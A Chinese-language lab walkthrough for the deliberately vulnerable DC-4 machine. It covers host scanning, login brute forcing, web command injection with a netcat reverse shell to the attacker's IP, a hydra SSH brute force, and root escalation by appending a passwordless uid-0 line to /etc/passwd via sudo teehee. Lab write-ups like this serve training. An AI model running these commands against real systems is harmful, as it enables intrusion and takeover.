靶机
DVWA
Upload-labs
Xss-labs
Pikachu
DC-1
DC-2
DC-3
DC-4
DC-5
DC-6
DC-7
DC-8
DC-9
-
+
首页
DC-4
DC系列是专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验,目前总共有9个靶机 关注微信公众号:网络安全101,公众号内回复**DC**,即可获取DC系列靶机镜像! 导入DC4靶机,网络适配器选择NAT模式,确保和kali处于同一IP段!!! ## 信息收集 > 确定主机IP地址 ```bash netdiscover -i eth0 -r 192.168.84.0/24 ```  > 扫描端口信息  > nmap 鉴权 ```bash nmap 192.168.84.180 -sV -A -p 80 --script=vuln ```  ## WEB测试 > 访问靶机的80端口  由网页提示用户可能是admin,针对admin用户进行暴力破解 > burp抓包请求包,进行暴力破解 密码为happy  登录成功  > 该页面,通过点击不同的功能按钮,得到不同的结果,猜测可能是执行了不同的命令  > burp抓包发现,传参的是Linux命令,且与功能按钮点匹配  > 修改传参点,会怎么样呢?  > 执行反弹shell 目标上执行 ```bash nc+192.168.84.174+10086+-e+/bin/bash 192.168.84.174 -- 攻击机IP地址 10086 -- 攻击机的端口 ```  攻击机上进行端口的监听  > 获取标准的shell ```bash python -c 'import pty;pty.spawn("/bin/bash")' ```  ## 提权 > 读取passwd文件发现有三个普通用户,然后分别进行了查看  > 查看每个用户的家目录-在jim用户的家目录发现了old-password文件   > 由于开放了22端口,则对jim用户进行ssh服务爆破 ```bash hydra -l jim -P ./jim-oldpasswd.txt 192.168.84.180 ssh jim-oldpasswd.txt为jim家目录下的old-passwords.bak文件 ```  > 登录jim用户  > 在/var/mail下有封邮件  得知charles用户的密码为^xHhA&hvim0y,登录成功  > sudo -l > > 发现teehee 不需要root的用户密码  > teehee ```bash teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权 核心思路就是利用其在passwd文件中追加一条uid为0的用户条目 例如:echo "xbxaq==0:0==:/bin/bash" | sudo teehee -a /etc/passwd 按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。 所以只需要执行su xbxaq就可以登录到xbxaq用户,这个用户因为uid为0,所以也是root权限 ``` **passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]** > 提权命令 ```bash echo 'xbxaq::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd ```  
毛林
2025年9月7日 11:42
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码